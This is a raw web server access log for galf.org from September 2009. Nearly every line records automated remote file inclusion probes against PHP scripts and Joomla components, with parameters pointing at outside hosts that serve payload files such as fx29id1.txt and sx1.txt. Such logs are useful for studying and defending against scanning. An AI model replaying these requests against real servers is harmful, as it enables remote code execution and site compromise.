94.136.37.141 - - [06/Sep/2009:17:00:16 -0700] "GET /error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [06/Sep/2009:17:00:16 -0700] "GET /logs/access.log%20%20/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [06/Sep/2009:17:00:16 -0700] "GET /logs/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [06/Sep/2009:17:00:25 -0700] "GET /logs/access.log%20%20/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [06/Sep/2009:17:00:25 -0700] "GET /logs/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [06/Sep/2009:17:00:25 -0700] "GET /error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [06/Sep/2009:17:00:54 -0700] "GET /logs/access_090406.log/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:00:54 -0700] "GET /error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:00:54 -0700] "GET /logs/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:01:49 -0700] "GET /logs/access_090406.log/error.php?dir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:01:49 -0700] "GET /error.php?dir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:01:49 -0700] "GET /logs/error.php?dir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:02:08 -0700] "GET /logs/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:02:08 -0700] "GET /logs/access_090406.log%20%20/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:02:08 -0700] "GET /error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:02:15 -0700] "GET /logs/access.log/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
94.136.37.141 - - [06/Sep/2009:17:02:15 -0700] "GET /logs/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
94.136.37.141 - - [06/Sep/2009:17:02:15 -0700] "GET /error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
94.136.37.141 - - [06/Sep/2009:17:02:39 -0700] "GET /logs/access_090406.log%20%20/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:02:39 -0700] "GET /error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:02:39 -0700] "GET /logs/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:06:56 -0700] "GET /logs/access_090406.log/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:06:56 -0700] "GET /logs/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:06:56 -0700] "GET /error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
82.194.85.198 - - [06/Sep/2009:17:15:22 -0700] "GET /logs///index.php?nic=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:17:37 -0700] "GET /index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:17:37 -0700] "GET /logs/access_090413.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:17:37 -0700] "GET /logs/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:17:43 -0700] "GET /logs/access_090413.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:17:43 -0700] "GET /logs/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:17:43 -0700] "GET /index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:18:07 -0700] "GET /logs/access_090413.log%20/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:18:07 -0700] "GET /index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:18:07 -0700] "GET /logs/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:18:18 -0700] "GET /logs/access_090413.log%20/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:18:18 -0700] "GET /index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:18:18 -0700] "GET /logs/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:18:24 -0700] "GET /logs/access_090413.log%20/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:18:24 -0700] "GET /logs/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:18:24 -0700] "GET /index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:18:33 -0700] "GET /logs/access_090413.log%20/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:18:33 -0700] "GET /index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:18:33 -0700] "GET /logs/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:19:41 -0700] "GET /logs/access_090413.log/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:19:50 -0700] "GET /logs/access_090413.log/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.194.85.198 - - [06/Sep/2009:17:20:07 -0700] "GET /logs///index.php?nic=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
82.194.85.198 - - [06/Sep/2009:17:20:08 -0700] "GET /logs///errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:20:08 -0700] "GET /logs/access_090413.log/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:20:13 -0700] "GET /logs/access_090316.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:20:58 -0700] "GET /logs/access_090316.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:21:34 -0700] "GET /logs/access_090413.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:21:34 -0700] "GET /logs/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:21:34 -0700] "GET /index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:21:45 -0700] "GET /logs/access_090413.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:21:45 -0700] "GET /index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:21:45 -0700] "GET /logs/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:22:07 -0700] "GET /logs/access_090413.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:22:08 -0700] "GET /index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:22:08 -0700] "GET /logs/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:22:13 -0700] "GET /logs/access_090413.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:22:13 -0700] "GET /index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:22:13 -0700] "GET /logs/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:22:40 -0700] "GET /logs/access_090316.log/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:17:22:54 -0700] "GET /paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:17:22:54 -0700] "GET /logs//paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:17:22:54 -0700] "GET /logs/access.log%20%20//paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:17:23:08 -0700] "GET /logs/access.log%20%20//paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:17:23:19 -0700] "GET /paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:17:23:19 -0700] "GET /logs//paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.186.117.226 - - [06/Sep/2009:17:23:20 -0700] "GET /logs/access.log%20%20//paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [06/Sep/2009:17:23:30 -0700] "GET /logs/access_090316.log/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:24:32 -0700] "GET /logs/access_090316.log/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:25:10 -0700] "GET /logs/access_090316.log/index.php?body=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:26:07 -0700] "GET /logs/access_090316.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:27:02 -0700] "GET /logs/access_090316.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:27:15 -0700] "GET /logs/access_090316.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:27:24 -0700] "GET /logs/access_090316.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
65.182.186.172 - - [06/Sep/2009:17:27:31 -0700] "GET /logs/access.log//?commonpath=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
65.182.186.172 - - [06/Sep/2009:17:27:31 -0700] "GET /?commonpath=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
65.182.186.172 - - [06/Sep/2009:17:27:36 -0700] "GET /logs//?commonpath=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
82.194.85.198 - - [06/Sep/2009:17:28:16 -0700] "GET /logs///index.php?nic=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:28:52 -0700] "GET /logs/access.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:29:06 -0700] "GET /logs/access_090209.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:29:32 -0700] "GET /logs/access.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:29:32 -0700] "GET /logs/access_090209.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:33:07 -0700] "GET /logs/access.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [06/Sep/2009:17:33:11 -0700] "GET /logs/access_090209.log/index.php?body=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
82.194.85.198 - - [06/Sep/2009:17:34:28 -0700] "GET /logs///index.php?nic=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.132.238.188 - - [06/Sep/2009:17:35:40 -0700] "GET /index.php?nic=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
82.194.85.198 - - [06/Sep/2009:17:37:26 -0700] "GET /logs///errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
63.249.95.132 - - [06/Sep/2009:17:42:11 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.0" 404 275 "-" "-" "www.galf.org"
63.249.95.132 - - [06/Sep/2009:17:42:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.0" 404 275 "-" "-" "www.galf.org"
63.249.95.132 - - [06/Sep/2009:17:42:11 -0700] "GET /logs/access_090720.log%20/modules/My_eGallery/index.php?basepath=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
209.132.238.188 - - [06/Sep/2009:17:42:44 -0700] "GET /errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
82.194.85.198 - - [06/Sep/2009:17:54:19 -0700] "GET /logs///errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.132.238.188 - - [06/Sep/2009:17:57:43 -0700] "GET /errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:18:00:22 -0700] "GET /logs/access.log/config.php?inc_dir=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
72.44.187.42 - - [06/Sep/2009:18:00:22 -0700] "GET /config.php?inc_dir=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
72.44.187.42 - - [06/Sep/2009:18:00:22 -0700] "GET /logs/config.php?inc_dir=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
72.44.187.42 - - [06/Sep/2009:18:01:30 -0700] "GET /logs/access_090202.log/config.php?inc_dir=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:18:01:30 -0700] "GET /config.php?inc_dir=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:18:01:30 -0700] "GET /logs/config.php?inc_dir=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
79.13.185.108 - - [06/Sep/2009:18:02:17 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.13.185.108 - - [06/Sep/2009:18:02:17 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.13.185.108 - - [06/Sep/2009:18:02:20 -0700] "GET /logs/access.log%20%20//convert/mvcw.php?step=1&vwar_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.51.114 - - [06/Sep/2009:18:02:31 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
82.194.85.198 - - [06/Sep/2009:18:04:59 -0700] "GET /logs///errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
67.19.118.186 - - [06/Sep/2009:18:07:33 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.38.136.251 - - [06/Sep/2009:18:18:36 -0700] "GET /logs/access_090706.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:18:18:36 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:18:18:36 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:18:18:43 -0700] "GET /logs/access_090706.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:18:18:43 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:18:18:43 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:18:18:58 -0700] "GET /logs/access_090406.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
